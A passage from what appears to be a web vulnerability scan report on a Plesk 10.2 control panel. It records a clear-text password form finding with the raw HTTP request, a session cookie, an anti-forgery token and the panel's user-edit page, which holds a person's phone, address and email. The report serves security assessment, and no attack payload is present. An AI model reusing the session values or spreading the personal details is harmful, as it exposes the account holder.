onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fuser%2Fcreate%2F' + '&activeModule=' + 'users' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"active","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb/user/list">
<span>Up Level</span>
</a>
</div>
<h2><span>Create User Account</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
//<![CDATA[
Smb.UserEditForm = Class.create({

initialize: function(config) {

if (!$('general-account-loginString')) {
return;
}

if ($('general-vcard-email-emailType-internal')) {
$('general-vcard-email-emailType-internal').observe('click', this._generateLogin.bind(this));
}
if ($('general-vcard-email-internalEmail')) {
$('general-vcard-email-internalEmail').observe('keyup', this._generateLogin.bind(this));
$('general-vcard-email-internalEmail').observe('change', this._generateLogin.bind(this));
}
if ($('general-vcard-email-domain')) {
$('general-vcard-email-domain').observe('change', this._generateLogin.bind(this));
}

if ($('general-vcard-email-emailType-external')) {
$('general-vcard-email-emailType-external').observe('click', this._generateLogin.bind(this));
}
if ($('general-vcard-email-externalEmail')) {
$('general-vcard-email-externalEmail').observe('keyup', this._generateLogin.bind(this));
$('general-vcard-email-externalEmail').observe('change', this._generateLogin.bind(this));
}
},

_generateLogin: function() {
if ($('general-vcard-email-emailType-internal') && $('general-vcard-email-emailType-internal').checked) {
var loginString = $('general-vcard-email-internalEmail').value;
if ('' == loginString) {
//empty username
} else
if ($('general-vcard-email-domain')) {
loginString += '@' + $('general-vcard-email-domain').options[$('general-vcard-email-domain').selectedIndex].text;
} else {
loginString += '@' + $('general-vcard-email-internalEmail-domain').innerHTML;
}
$('general-account-loginString').update(loginString);
} else if ($('general-vcard-email-emailType-external') && $('general-vcard-email-emailType-external').checked) {
var loginString = $('general-vcard-email-externalEmail').value;
$('general-account-loginString').update(loginString);
} else if ($('general-vcard-email-externalEmail')) {
var loginString = $('general-vcard-email-externalEmail').value;
$('general-account-loginString').update(loginString);
}
}
});

Jsw.onReady(function() {
new Smb.UserEditForm();
});
//]]>
</script><form id="form-user" enctype="application/x-www-form-urlencoded" action="" method="post">


<div id='general-vcard' class='form-box' >
<div id='general-vcard-content-area'>
<div id='general-vcard-contactName-form-row' class='form-row' >
<div class='field-name'><label for='general-vcard-contactName'>Contact name&nbsp;<span class="required">*</span></label></div>
<div class='field-value'>

<input type="text" name="general[vcard][contactName]" id="general-vcard-contactName" value="" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div class="form-row">
<div class='field-name'>
<label for='general-vcard-email-emailType'>E-mail address which is also used as a username for logging in to the Panel&nbsp;</label> <span class="required">*</span>
</div>
<div class="field-value">
<div class="text-value">
<div class="indent-box">

<span><input type="radio" class="radio"
value="internal"
id="general-vcard-email-emailType-internal"
name="general[vcard][email][emailType]"
checked="checked" /></span>

<div class="indent-box-content">
<label for="general-vcard-email-emailType-internal">Create an e-mail address under your account</label>
<div class='form-row'>
<div>
<input type="text" name="general[vcard][email][internalEmail]" id="general-vcard-email-internalEmail" value="" class="input-text" /> @<span id='general-vcard-email-internalEmail-domain'>vulnerable.host.fqdn</span></div>
<span class='field-errors'>
</span>
</div>
</div>

</div>
<div class="indent-box">

<span><input type="radio" class="radio"
value="external"
id="general-vcard-email-emailType-external"
name="general[vcard][email][emailType]"
/></span>

<div class="indent-box-content">
<label for="general-vcard-email-emailType-external">Use an external e-mail address</label>
<div class='form-row'>
<div>
<input type="text" name="general[vcard][email][externalEmail]" id="general-vcard-email-externalEmail" value="" class="f-middle-size input-text" disabled="1" /></div>
<span class='field-errors'>
</span>
</div>
</div>

</div>
</div>
</div>
</div>

<script type="text/javascript">
//<![CDATA[
Smb.UserEmailForm = Class.create({

initialize: function(config) {
this._prefix = config['prefix'];
this._internalEmailId = this._prefix + config['internalEmailId'];
this._internalEmailElements = config['internalEmailElements'];
this._externalEmailId = this._prefix + config['externalEmailId'];
this._externalEmailElements = config['externalEmailElements'];
$(this._internalEmailId).observe('click', this._internalEmailOnClick.bind(this));
$(this._externalEmailId).observe('click', this._externalEmailOnClick.bind(this));
if ($(this._internalEmailId).checked) {
this._internalEmailOnClick();
} else {
   this._externalEmailOnClick();
}
},

_internalEmailOnClick: function() {
this._externalEmailElements.each(function(elementId) {
$(this._prefix + elementId).disable();
}, this);
this._internalEmailElements.each(function(elementId) {
$(this._prefix + elementId).enable();
}, this);
},

_externalEmailOnClick: function() {
this._internalEmailElements.each(function(elementId) {
$(this._prefix + elementId).disable();
}, this);
this._externalEmailElements.each(function(elementId) {
$(this._prefix + elementId).enable();
}, this);
}
});

Jsw.onReady(function() {
new Smb.UserEmailForm({
prefix: 'general-vcard-email-',
internalEmailId: 'emailType-internal',
internalEmailElements: ['internalEmail'
],
externalEmailId: 'emailType-external',
externalEmailElements: ['externalEmail']
});

});
//]]>
</script>


<div id='general-vcard-roleId-form-row' class='form-row' >
<div class='field-name'><label for='general-vcard-roleId'>User role&nbsp;</label></div>
<div class='field-value'>

<select name="general[vcard][roleId]" id="general-vcard-roleId">
<option value="5" label="Owner">Owner</option>
<option value="6" label="WebMaster">WebMaster</option>
<option value="7" label="Application User" selected="selected">Application User</option>
<option value="8" label="Accountant">Accountant</option>
</select>
<span class='field-errors' style="display:none;"></span>
<span class="hint">User roles grant users administrative privileges and access to applications that you selected for the role.</span>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'General Information',
applyTo: 'general-vcard'
});
});
//]]>
</script>


<div id='general-account' class='form-box' >
<div id='general-account-content-area'>

<div class='form-row'>
<div class='field-name'><label for='general-account-loginString'>Username&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<span id='general-account-loginString'></span>

</div>
</div>
</div>
<div id='general-account-password-form-row' class='form-row' >
<div class='field-name'><label for='general-account-password'>Password&nbsp;<span class="required">*</span></label></div>
<div class='field-value'>

<input type="password" name="general[account][password]" id="general-account-password" value="" class="input-text" autocomplete="off" />
<span class='field-errors' style="display:none;"></span>

</div>
</div><script type='text/javascript'>
Jsw.onReady(function() {
var pswd = $('general-account-password');
new Jsw.PasswordMeter({
renderTo: 'general-account-password',
renderMode: 'after',
observe: 'general-account-password',
locale: {"title":"Password Strength","description":"To improve your password: ","passwordTooShort":"Make the password longer.","lettersLowerCase":"Use at least one lower-case character.","lettersUpperCase":"Use at least one upper-case character.","numbers1":"Use at least one number.","numbers3":"Use at least three numbers.","specialChar1":"Use at least one special character (for example: !, @, #, $, % ,^, &, *, ?, _, ~).","specialChar2":"Use at least two special characters (for example: !, @, #, $, %, ^, &, *, ?, _, ~).","comboUpperAndLower":"Use both upper and lower-case characters.","comboLettersAndNumbers":"Use both numbers and characters.","comboLettersNumbersSpecial":"Use numbers, characters and special characters.","yourPasswordIsStrong":"Your password is strong, but you can make it even stronger by increasing its length.","verdictNone":"Very weak","verdictVeryWeak":"Very weak","verdictWeak":"Weak","verdictMediocre":"Medium","verdictStrong":"Strong","verdictStronger":"Very strong"}
}).render();
});</script>
<div id='general-account-passwordConfirmation-form-row' class='form-row' >
<div class='field-name'><label for='general-account-passwordConfirmation'>Confirm password&nbsp;<span class="required">*</span></label></div>
<div class='field-value'>

<input type="password" name="general[account][passwordConfirmation]" id="general-account-passwordConfirmation" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>

<div class='form-row'>
<div class='single-row'>
<div class='indent-box'>

<input type="hidden" name="general[account][isActive]" value="0" /><input type="checkbox" name="general[account][isActive]" id="general-account-isActive" value="1" checked="checked" class="checkbox" />
<div class='indent-box-content'>
<label for='general-account-isActive'>User is active&nbsp;</label>
<span class="hint">Active users can access the Panel.</span>
</div>
</div>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'Panel Preferences',
applyTo: 'general-account'
});
});
//]]>
</script>


<div class="btns-box">
<div class="box-area">
<div class="form-row">
<div class="field-name">
<span class="required">*</span>
Required fields </div>
<div class="field-value">

<span id='btn-send' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-send',
title: 'OK',
cls: 'btn',
name: 'send',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.submit(this); }
});
});
</script>

<span id='btn-cancel' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-cancel',
title: 'Cancel',
cls: 'btn',
name: 'cancel',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.redirect("/user/list"); }
});
});
</script>

<input type="hidden" name="hidden" value="" id="hidden" />
<!-- ability to submit form via Enter -->
<input type="image" src="/skins/default/img/blank.gif" style="border: 0; height: 0; width: 0; position: absolute;" />
</div>
</div>
</div>
</div>

<input type="hidden" name="forgery_protection_token" value="3e86204e9517123c7f585d736d64aa3f" id="form_forgery_protection_token" /></form>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.FormAjax({
applyTo: 'form-user',
waitButtonTitle: 'Please wait'
})
});
</script>

</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

3.11. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/edit/id/2  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/user/edit/id/2

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /smb/user/edit/id/2 HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:23:33 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:23:34 GMT
Connection: close
Content-Length: 45694

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="3e86204e9517123c7f585d736d64aa3f" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<title>Hoyt LLC Research - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/user/action-name/edit" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fuser%2Fedit%2Fid%2F2' + '&activeModule=' + 'users' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"active","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading no-border">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb/user/list">
<span>Up Level</span>
</a>
</div>
<h2><span><b>Hoyt LLC Research</b></span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
//<![CDATA[
Smb.UserEditForm = Class.create({

initialize: function(config) {

if (!$('general-account-loginString')) {
return;
}

if ($('general-vcard-email-emailType-internal')) {
$('general-vcard-email-emailType-internal').observe('click', this._generateLogin.bind(this));
}
if ($('general-vcard-email-internalEmail')) {
$('general-vcard-email-internalEmail').observe('keyup', this._generateLogin.bind(this));
$('general-vcard-email-internalEmail').observe('change', this._generateLogin.bind(this));
}
if ($('general-vcard-email-domain')) {
$('general-vcard-email-domain').observe('change', this._generateLogin.bind(this));
}

if ($('general-vcard-email-emailType-external')) {
$('general-vcard-email-emailType-external').observe('click', this._generateLogin.bind(this));
}
if ($('general-vcard-email-externalEmail')) {
$('general-vcard-email-externalEmail').observe('keyup', this._generateLogin.bind(this));
$('general-vcard-email-externalEmail').observe('change', this._generateLogin.bind(this));
}
},

_generateLogin: function() {
if ($('general-vcard-email-emailType-internal') && $('general-vcard-email-emailType-internal').checked) {
var loginString = $('general-vcard-email-internalEmail').value;
if ('' == loginString) {
//empty username
} else
if ($('general-vcard-email-domain')) {
loginString += '@' + $('general-vcard-email-domain').options[$('general-vcard-email-domain').selectedIndex].text;
} else {
loginString += '@' + $('general-vcard-email-internalEmail-domain').innerHTML;
}
$('general-account-loginString').update(loginString);
} else if ($('general-vcard-email-emailType-external') && $('general-vcard-email-emailType-external').checked) {
var loginString = $('general-vcard-email-externalEmail').value;
$('general-account-loginString').update(loginString);
} else if ($('general-vcard-email-externalEmail')) {
var loginString = $('general-vcard-email-externalEmail').value;
$('general-account-loginString').update(loginString);
}
}
});

Jsw.onReady(function() {
new Smb.UserEditForm();
});
//]]>
</script><form id="form-user" enctype="application/x-www-form-urlencoded" action="" method="post"><div id='form-tab-buttons' class='tabs'></div><script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.bar.Tabs({
type: 'dynamic',
applyTo: 'form-tab-buttons',
items: [{"componentType":"Jsw.bar.Button","title":"General","tabId":"tab-general","containerCls":"active"},{"componentType":"Jsw.bar.Button","title":"Contact Details","tabId":"tab-contacts","containerCls":""}]
});
});
</script>

<div id='tab-general' >

<div id='general-vcard' class='form-box' >
<div id='general-vcard-content-area'>

<div class='form-row'>
<div class='field-name'><label for='general-vcard-contactName'>Contact name&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<span id='general-vcard-contactName'>Hoyt LLC Research</span>

</div>
</div>
</div>
<div class="form-row">
<div class='field-name'>
<label for='general-vcard-email-emailType'>E-mail address&nbsp;</label> <span class="required">*</span>
</div>
<div class="field-value">
<div class="text-value">
<div class="indent-box">

<span><input type="radio" class="radio"
value="internal"
id="general-vcard-email-emailType-internal"
name="general[vcard][email][emailType]"
/></span>

<div class="indent-box-content">
<label for="general-vcard-email-emailType-internal">Create an e-mail address under your account</label>
<div class='form-row'>
<div>
<input type="text" name="general[vcard][email][internalEmail]" id="general-vcard-email-internalEmail" value="h02332" class="input-text" /> @<span id='general-vcard-email-internalEmail-domain'>vulnerable.host.fqdn</span></div>
<span class='field-errors'>
</span>
</div>
</div>

</div>
<div class="indent-box">

<span><input type="radio" class="radio"
value="external"
id="general-vcard-email-emailType-external"
name="general[vcard][email][emailType]"
checked="checked" /></span>

<div class="indent-box-content">
<label for="general-vcard-email-emailType-external">Use an external e-mail address</label>
<div class='form-row'>
<div>
<input type="text" name="general[vcard][email][externalEmail]" id="general-vcard-email-externalEmail" value="h02332@gmail.com" class="f-middle-size input-text" disabled="1" /></div>
<span class='field-errors'>
</span>
</div>
</div>

</div>
</div>
</div>
</div>

<script type="text/javascript">
//<![CDATA[
Smb.UserEmailForm = Class.create({

initialize: function(config) {
this._prefix = config['prefix'];
this._internalEmailId = this._prefix + config['internalEmailId'];
this._internalEmailElements = config['internalEmailElements'];
this._externalEmailId = this._prefix + config['externalEmailId'];
this._externalEmailElements = config['externalEmailElements'];
$(this._internalEmailId).observe('click', this._internalEmailOnClick.bind(this));
$(this._externalEmailId).observe('click', this._externalEmailOnClick.bind(this));
if ($(this._internalEmailId).checked) {
this._internalEmailOnClick();
} else {
   this._externalEmailOnClick();
}
},

_internalEmailOnClick: function() {
this._externalEmailElements.each(function(elementId) {
$(this._prefix + elementId).disable();
}, this);
this._internalEmailElements.each(function(elementId) {
$(this._prefix + elementId).enable();
}, this);
},

_externalEmailOnClick: function() {
this._internalEmailElements.each(function(elementId) {
$(this._prefix + elementId).disable();
}, this);
this._externalEmailElements.each(function(elementId) {
$(this._prefix + elementId).enable();
}, this);
}
});

Jsw.onReady(function() {
new Smb.UserEmailForm({
prefix: 'general-vcard-email-',
internalEmailId: 'emailType-internal',
internalEmailElements: ['internalEmail'
],
externalEmailId: 'emailType-external',
externalEmailElements: ['externalEmail']
});

});
//]]>
</script>


<div id='general-vcard-roleId-form-row' class='form-row' >
<div class='field-name'><label for='general-vcard-roleId'>User role&nbsp;</label></div>
<div class='field-value'>

<select name="general[vcard][roleId]" id="general-vcard-roleId" disabled="1">
<option value="5" label="Owner" selected="selected">Owner</option>
<option value="6" label="WebMaster">WebMaster</option>
<option value="7" label="Application User">Application User</option>
<option value="8" label="Accountant">Accountant</option>
</select>
<span class='field-errors' style="display:none;"></span>
<span class="hint">User roles grant users administrative privileges and access to applications that you selected for the role.</span>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'General Information',
applyTo: 'general-vcard'
});
});
//]]>
</script>


<div id='general-account' class='form-box' >
<div id='general-account-content-area'>

<div class='form-row'>
<div class='field-name'><label for='general-account-login'>Username&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<span id='general-account-login'>xsscx</span>

</div>
</div>
</div>
<div id='general-account-password-form-row' class='form-row' >
<div class='field-name'><label for='general-account-password'>Password&nbsp;</label></div>
<div class='field-value'>

<input type="password" name="general[account][password]" id="general-account-password" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div><script type='text/javascript'>
Jsw.onReady(function() {
var pswd = $('general-account-password');
new Jsw.PasswordMeter({
renderTo: 'general-account-password',
renderMode: 'after',
observe: 'general-account-password',
locale: {"title":"Password Strength","description":"To improve your password: ","passwordTooShort":"Make the password longer.","lettersLowerCase":"Use at least one lower-case character.","lettersUpperCase":"Use at least one upper-case character.","numbers1":"Use at least one number.","numbers3":"Use at least three numbers.","specialChar1":"Use at least one special character (for example: !, @, #, $, % ,^, &, *, ?, _, ~).","specialChar2":"Use at least two special characters (for example: !, @, #, $, %, ^, &, *, ?, _, ~).","comboUpperAndLower":"Use both upper and lower-case characters.","comboLettersAndNumbers":"Use both numbers and characters.","comboLettersNumbersSpecial":"Use numbers, characters and special characters.","yourPasswordIsStrong":"Your password is strong, but you can make it even stronger by increasing its length.","verdictNone":"Very weak","verdictVeryWeak":"Very weak","verdictWeak":"Weak","verdictMediocre":"Medium","verdictStrong":"Strong","verdictStronger":"Very strong"}
}).render();
});</script>
<div id='general-account-passwordConfirmation-form-row' class='form-row' >
<div class='field-name'><label for='general-account-passwordConfirmation'>Confirm password&nbsp;</label></div>
<div class='field-value'>

<input type="password" name="general[account][passwordConfirmation]" id="general-account-passwordConfirmation" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='general-account-language-form-row' class='form-row' >
<div class='field-name'><label for='general-account-language'>Panel language&nbsp;</label></div>
<div class='field-value'>

<select name="general[account][language]" id="general-account-language">
<option value="en-US" label="ENGLISH (United States)" selected="selected">ENGLISH (United States)</option>
</select>
<span class='field-errors' style="display:none;"></span>

</div>
</div>

<div class='form-row'>
<div class='single-row'>
<div class='indent-box'>

<input type="hidden" name="general[account][isActive]" value="0" /><input type="checkbox" name="general[account][isActive]" id="general-account-isActive" value="1" checked="checked" class="checkbox" disabled="disabled" />
<div class='indent-box-content'>
<label for='general-account-isActive'>User is active&nbsp;</label>
<span class="hint">Active users can access the Panel.</span>
</div>
</div>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'Panel Preferences',
applyTo: 'general-account'
});
});
//]]>
</script>
</div>
<div id='tab-contacts' style="display: none;">

<div id='contacts-contactsSection' class='form-box' >
<div id='contacts-contactsSection-content-area'>
<div id='contacts-contactsSection-companyName-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-companyName'>Company name&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][companyName]" id="contacts-contactsSection-companyName" value="Hoyt LLC Research" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-phone-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-phone'>Phone number&nbsp;<span class="required">*</span></label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][phone]" id="contacts-contactsSection-phone" value="+1 339 206 1886" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-fax-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-fax'>Fax number&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][fax]" id="contacts-contactsSection-fax" value="" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-address-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-address'>Address&nbsp;</label></div>
<div class='field-value'>

<textarea name="contacts[contactsSection][address]" id="contacts-contactsSection-address" class="f-middle-size" rows="4" cols="80">PO BOX 250
</textarea>
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-city-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-city'>City&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][city]" id="contacts-contactsSection-city" value="Accord" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-state-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-state'>State or province&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][state]" id="contacts-contactsSection-state" value="MA" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-zip-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-zip'>Postal or ZIP code&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="contacts[contactsSection][zip]" id="contacts-contactsSection-zip" value="02018" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='contacts-contactsSection-country-form-row' class='form-row' >
<div class='field-name'><label for='contacts-contactsSection-country'>Country&nbsp;</label></div>
<div class='field-value'>

<select name="contacts[contactsSection][country]" id="contacts-contactsSection-country">
<option value="AF" label="Afghanistan">Afghanistan</option>
<option value="AX" label="..land Islands">..land Islands</option>
<option value="AL" label="Albania">Albania</option>
<option value="DZ" label="Algeria">Algeria</option>
<option value="AS" label="American Samoa">American Samoa</option>
<option value="AD" label="Andorra">Andorra</option>
<option value="AO" label="Angola">Angola</option>
<option value="AI" label="Anguilla">Anguilla</option>
<option value="AQ" label="Antarctica">Antarctica</option>
<option value="AG" label="Antigua and Barbuda">Antigua and Barbuda</option>
<option value="AR" label="Argentina">Argentina</option>
<option value="AM" label="Armenia">Armenia</option>
<option value="AW" label="Aruba">Aruba</option>
<option value="AU" label="Australia">Australia</option>
<option value="AT" label="Austria">Austria</option>
<option value="AZ" label="Azerbaijan">Azerbaijan</option>
<option value="BS" label="Bahamas">Bahamas</option>
<option value="BH" label="Bahrain">Bahrain</option>
<option value="BD" label="Bangladesh">Bangladesh</option>
<option value="BB" label="Barbados">Barbados</option>
<option value="BY" label="Belarus">Belarus</option>
<option value="BE" label="Belgium">Belgium</option>
<option value="BZ" label="Belize">Belize</option>
<option value="BJ" label="Benin">Benin</option>
<option value="BM" label="Bermuda">Bermuda</option>
<option value="BT" label="Bhutan">Bhutan</option>
<option value="BO" label="Bolivia, Plurinational State of">Bolivia, Plurinational State of</option>
<option value="BA" label="Bosnia and Herzegovina">Bosnia and Herzegovina</option>
<option value="BW" label="Botswana">Botswana</option>
<option value="BV" label="Bouvet Island">Bouvet Island</option>
<option value="BR" label="Brazil">Brazil</option>
<option value="IO" label="British Indian Ocean Territory">British Indian Ocean Territory</option>
<option value="BN" label="Brunei Darussalam">Brunei Darussalam</option>
<option value="BG" label="Bulgaria">Bulgaria</option>
<option value="BF" label="Burkina Faso">Burkina Faso</option>
